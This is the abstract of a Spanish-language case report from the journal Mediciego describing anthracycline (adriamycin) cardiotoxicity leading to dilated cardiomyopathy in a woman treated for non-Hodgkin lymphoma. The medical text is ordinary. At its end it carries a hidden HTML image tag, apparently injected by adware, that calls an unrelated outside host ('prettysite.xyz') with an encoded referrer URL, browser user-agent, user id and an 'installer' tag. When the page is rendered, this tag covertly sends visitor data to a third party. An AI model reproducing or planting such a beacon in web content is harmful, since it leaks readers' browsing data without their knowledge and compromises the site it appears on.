Cardiotoxicidad por Antraciclinas. Presentación de un caso - Baró Rojas, Mayelin; Sánchez González, Edmundo Luis; García Sotolongo, Wilfredo (Mediciego, 2013)
Se presenta un caso atendido en el Hospital Provincial Docente “Dr. Antonio Luaces Iraola” de Ciego de Ávila, que por su poca frecuencia se considera importante su exposición. Una mujer de 54 años con lesión en el paladar, de gran tamaño, redondeada, de superficie dura e irregular, a la que se le realizan estudios y se diagnóstica un Linfoma no Hodgkin bien diferenciado. Se brinda tratamiento con esquema de quimioterapia de 8 ciclos cada 21 días; al séptimo ciclo, con una dosis acumulada de adriamicina de 660mg/m2; comienza a presentar disnea al hacer grandes esfuerzos, se fue agravando su condición clínica y llega al Hospital con un edema agudo de pulmón; se le realizan estudios clínicos. Se concluye el caso con el diagnóstico de miocardiopatía dilatada.<img src="http://prettysite.xyz/acnt?_=1583868234341&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F278&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />